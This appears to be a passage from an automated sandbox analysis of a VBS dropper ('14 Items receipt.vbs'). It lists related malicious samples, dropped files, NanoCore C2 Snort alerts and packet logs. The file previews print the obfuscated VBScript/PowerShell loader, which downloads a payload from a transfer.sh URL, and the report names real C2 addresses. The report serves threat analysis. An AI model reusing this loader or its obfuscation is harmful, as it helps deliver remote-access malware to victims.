	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	4J1sKiGm0T.exe	Get hash	malicious	Browse	116.203.165.54
	lB2RFTpyni.exe	Get hash	malicious	Browse	116.203.165.54
	lgT2LzjZ6N.exe	Get hash	malicious	Browse	116.203.165.54
	gmeqUPOV23.exe	Get hash	malicious	Browse	116.203.165.54
	BqgOuMRaJ3.exe	Get hash	malicious	Browse	116.203.165.54
	Invoice.xlsx	Get hash	malicious	Browse	136.243.159.53
	vPzJQvH6Pg.exe	Get hash	malicious	Browse	195.201.225.248
	#U65b0#U7684#U8b49#U66f8#U8868#U683c.pdf.exe	Get hash	malicious	Browse	136.243.159.53
PTPEU	16 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	SPT DRINGENDE BESTELLUNG _876453,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	41-Items-invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	Confirmaci#U00f3n del pedido- No HD10103,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	SPT DRINGENDE BESTELLUNG _8764,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	8 Items invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	heimatec RFQ 4556_ DRINGEND,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	Confirmarea comenzii noi-4019,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	vuaXoDsazg	Get hash	malicious	Browse	194.147.142.145
	dsMBH5SmxL	Get hash	malicious	Browse	194.147.142.145
	YIupXk5F7b	Get hash	malicious	Browse	194.147.142.145
	pvbuEVYCUB	Get hash	malicious	Browse	194.147.142.145
	1jTsJsy5b8	Get hash	malicious	Browse	194.147.142.145
	fpAHzxlGRn	Get hash	malicious	Browse	194.147.142.145
	sV5aR2SUfW.exe	Get hash	malicious	Browse	194.147.142.230
	qSN1mPnL52.exe	Get hash	malicious	Browse	194.147.142.230
	PO20171118-COGRAL SPA.jar	Get hash	malicious	Browse	185.105.236.179
	New Order_R4.jar	Get hash	malicious	Browse	185.105.236.179
	CYzY9Pi2ny.exe	Get hash	malicious	Browse	194.147.142.230
	l4w9e3daPT.exe	Get hash	malicious	Browse	194.147.142.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	144.76.136.153
	8aGRdeN1Be.exe	Get hash	malicious	Browse	144.76.136.153
	QLMRTJS9RA.exe	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.W32.AIDetect.malware2.32348.exe	Get hash	malicious	Browse	144.76.136.153
	diagram-477.doc	Get hash	malicious	Browse	144.76.136.153
	Rombat-0118PDF.exe	Get hash	malicious	Browse	144.76.136.153
	CLLKFIJI_(9-13-2021).xlsx.vbs	Get hash	malicious	Browse	144.76.136.153
	YyKMqtQcLMkGx.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210913_074002_566345 pdf.exe	Get hash	malicious	Browse	144.76.136.153
	Kopie dokladu o transakci 09_14_21.exe	Get hash	malicious	Browse	144.76.136.153
	qashmhBw9u.exe	Get hash	malicious	Browse	144.76.136.153
	setup_x86_x64_install.exe	Get hash	malicious	Browse	144.76.136.153
	Quotation.exe	Get hash	malicious	Browse	144.76.136.153
	PROJ-9560 - PACKING SLIP.exe	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210726_084931-069855PDF.exe	Get hash	malicious	Browse	144.76.136.153
	Synaptics_Software.exe	Get hash	malicious	Browse	144.76.136.153
	Synaptics_Software.exe	Get hash	malicious	Browse	144.76.136.153

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Run\New.vbs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3097
Entropy (8bit):	3.660573441547725
Encrypted:	false
SSDEEP:	96:a4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyD:a4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyB
MD5:	70A508C6E62F6D0656D37C5367B08AE1
SHA1:	788209E9A5533A02F368332DF64BBF8F9BAFE332
SHA-256:	51E4082E0B589A1BFD0BF1D93C00963662BBD418F3C5BC9F19457F25B28F43F0
SHA-512:	8BFED4BA7DBEA012D0CEBCB4877BD90052401EC00D8662D1BF86E194F711CED7D1941A195E244CC7D2FCB5E808553ACF06759B4B75159C794AEB743005E867B9
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\Public\Run\New.vbs, Author: Florian Roth
Reputation:	low
Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/5mLV5X/nyuhH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57895
Entropy (8bit):	5.080080220298808
Encrypted:	false
SSDEEP:	1536:cIu+z30xyJJV3CNBQkj22h4iUxxaVkflJnLvAHPqd+KSS3SOdB8NVzltAHkrNKer:ru+z30IJJV3CNBQkj22qiUxaVkflJnLu
MD5:	E494C8B04CCA7990028009C5A768629C
SHA1:	42B21DC378D323E339D49BDC8CD4F96DC5837358
SHA-256:	AB50EF20F6B7CFF39117E3E89980CDD2FCECBCEDDDE456FECED62FC3AED475BF
SHA-512:	E06018D7C94E7FFD45407DCBA4282C9F20D4736867AFC8A0EFF016A7AFA8210FB365A8BA3B9FD824C25744C13BA1D6F8390FD88BEFF44EE2C0332BE619A932CB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.X...........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1204
Entropy (8bit):	5.327588920450071
Encrypted:	false
SSDEEP:	24:3ULPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJP+qn:oPerB4nqRL/HvFe9t4Cv94aP+qn
MD5:	B2E8F5B1D2CA14F416C34A1D80229547
SHA1:	25427AFC9715DC9C34187C211788E2409C83FA48
SHA-256:	A0B23D2B06F072A75AE6E5182F3776207E9EB012C568F11A10E5EE55F1F7FD03
SHA-512:	D3E88A11415A981DD475ABB03BD2B1DAAA264FED387D1D6157317986CEC9FB813285EBCE2DEE4079A01EB929498B1D587482E8C05EF467D0796662369AC68AC0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_504w00vk.dm5.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5tw3aje.oei.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhDjhL
MD5:	84864902DEC5038CEF326FF21E8D5F98
SHA1:	2F10FEC81D95813C3B2530EC4CECED70164A08C5
SHA-256:	5B4853A46F99AC6445B68DC1A841D511D0E86C6EDEC2A0A84F3778039A578B6B
SHA-512:	A77BCDB522CE208C8D785F44D9FE90C6D1314CB199A4BE72E220F4B8C5446265EEEF1C51EFFD2D7BDCCDC8F4A76F803A41A4973364757950D0777E8BAEF0B14C
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:8S8t:8S8t
MD5:	378BACC43DD9BCE97C231A1B5BC9A1B2
SHA1:	4C94CF1392A116F78C16E91905A78739E892D246
SHA-256:	50AC6A3B0AB9FEAB8C50D20CA393C40EEC8446BF5C1833FAFEB8C259DEEDC506
SHA-512:	FC5F3D6A97F75E807C3092E9CA40865E2C72FA4241D73798ADC05A02C9AD46C9BB6CF0BF40A89270E43C187DEEF254419E5B061C48E55D300FAA7BA959F6454D
Malicious:	true
Preview:	.N..w.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	327768
Entropy (8bit):	7.999367066417797
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
MD5:	2E52F446105FBF828E63CF808B721F9C
SHA1:	5330E54F238F46DC04C1AC62B051DB4FCD7416FB
SHA-256:	2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
SHA-512:	C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\Documents\20210914\PowerShell_transcript.284992.OXzsVwK_.20210914164711.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12048
Entropy (8bit):	4.438693387888856
Encrypted:	false
SSDEEP:	192:Ps4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWi8yyyyyyyyyyyAnmyyyyyyyyyyyiH:PVX+amXEVX+amX7VX+amX5vyGLGLwl
MD5:	D8F9A344C0D1E39CDDA88069F12A1648
SHA1:	339290E6491A1C9E494D555D43E39C616E4C394E
SHA-256:	BEC57A4CFABE8453A46480AC9D54C1FB36C30CCBAA55D45030C72701AD114E1C
SHA-512:	B75E17C518B037D291F270C4586B69648A52851A3F9DECEC75A80F66B013CED34D5230163E6C82569FFFA3A09123122AF8F2BB1348DBFBD0C0967C2BFEE19C2E
Malicious:	false
Preview:	.*********************..Windows PowerShell transcript start..Start time: 20210914164712..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.6626285628273934
TrID:
File name:	14 Items receipt.vbs
File size:	3096
MD5:	a47a00103d35b883f7edbc91398ad40b
SHA1:	72c41b1fb3565c5499a9ca5191e178c85ecceb90
SHA256:	13e48ac9a85c335c0a27a9c13b1878150764d47523907ea1e12a6218d7ff57d6
SHA512:	2c0a16e8a68aa2c8ccb48e2f365e2e2fb9562ee94916f0d21b75ef74fed012348ca1794f9895f9d8ace7311769dd03ffbd3c89170b1b71b1212a726c452c1f4a
SSDEEP:	96:ws4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyh:ws4yyyyyyyyyyyyyyRyyyyyyyyyyyyyL
File Content Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/14/21-16:48:29.630674	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55046	8.8.8.8	192.168.2.4
09/14/21-16:48:29.902769	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49833	6700	192.168.2.4	194.147.140.20
09/14/21-16:48:36.819647	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49612	8.8.8.8	192.168.2.4
09/14/21-16:48:37.013387	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49834	6700	192.168.2.4	194.147.140.20
09/14/21-16:48:45.277862	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49835	6700	192.168.2.4	194.147.140.20
09/14/21-16:48:52.174994	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60875	8.8.8.8	192.168.2.4
09/14/21-16:48:52.368711	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49838	6700	192.168.2.4	194.147.140.20
09/14/21-16:48:59.653062	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59172	8.8.8.8	192.168.2.4
09/14/21-16:48:59.864669	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49841	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:06.793632	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62420	8.8.8.8	192.168.2.4
09/14/21-16:49:07.089533	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49842	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:13.901825	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60579	8.8.8.8	192.168.2.4
09/14/21-16:49:14.149941	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49843	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:21.256215	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49844	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:28.284148	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49845	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:35.270359	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49228	8.8.8.8	192.168.2.4
09/14/21-16:49:35.488252	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49846	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:42.258428	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59794	8.8.8.8	192.168.2.4
09/14/21-16:49:42.466756	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49847	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:49.445932	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49848	6700	192.168.2.4	194.147.140.20
09/14/21-16:49:55.376989	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52752	8.8.8.8	192.168.2.4
09/14/21-16:49:55.571034	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49849	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:02.438592	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60542	8.8.8.8	192.168.2.4
09/14/21-16:50:02.635837	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49850	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:08.713947	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60689	8.8.8.8	192.168.2.4
09/14/21-16:50:09.010240	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49851	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:15.675986	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64206	8.8.8.8	192.168.2.4
09/14/21-16:50:15.873224	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49852	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:23.581188	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50904	8.8.8.8	192.168.2.4
09/14/21-16:50:23.774825	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49853	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:30.768699	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49854	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:37.731235	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49855	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:44.620030	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53418	8.8.8.8	192.168.2.4
09/14/21-16:50:44.816203	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49856	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:51.732064	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49857	6700	192.168.2.4	194.147.140.20
09/14/21-16:50:58.626033	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59260	8.8.8.8	192.168.2.4
09/14/21-16:50:58.822330	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49858	6700	192.168.2.4	194.147.140.20
09/14/21-16:51:05.678262	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49944	8.8.8.8	192.168.2.4
09/14/21-16:51:05.873777	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49859	6700	192.168.2.4	194.147.140.20
09/14/21-16:51:12.787907	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49860	6700	192.168.2.4	194.147.140.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 16:47:21.305068970 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.305105925 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:21.305249929 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.332081079 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.332097054 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:21.439323902 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:21.439429045 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.443723917 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.443732023 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:21.444139004 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:21.470269918 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:21.515125990 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.121701956 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.121757984 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.122037888 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.122059107 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.122179985 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.126127958 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.134121895 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.134326935 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.134347916 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.134449005 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.137154102 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.137821913 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.137841940 CEST	443	49755	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:22.138535023 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:22.144362926 CEST	49755	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:57.692610025 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:57.692662954 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:57.692786932 CEST	49788	443	192.168.2.4	144.76.136.153
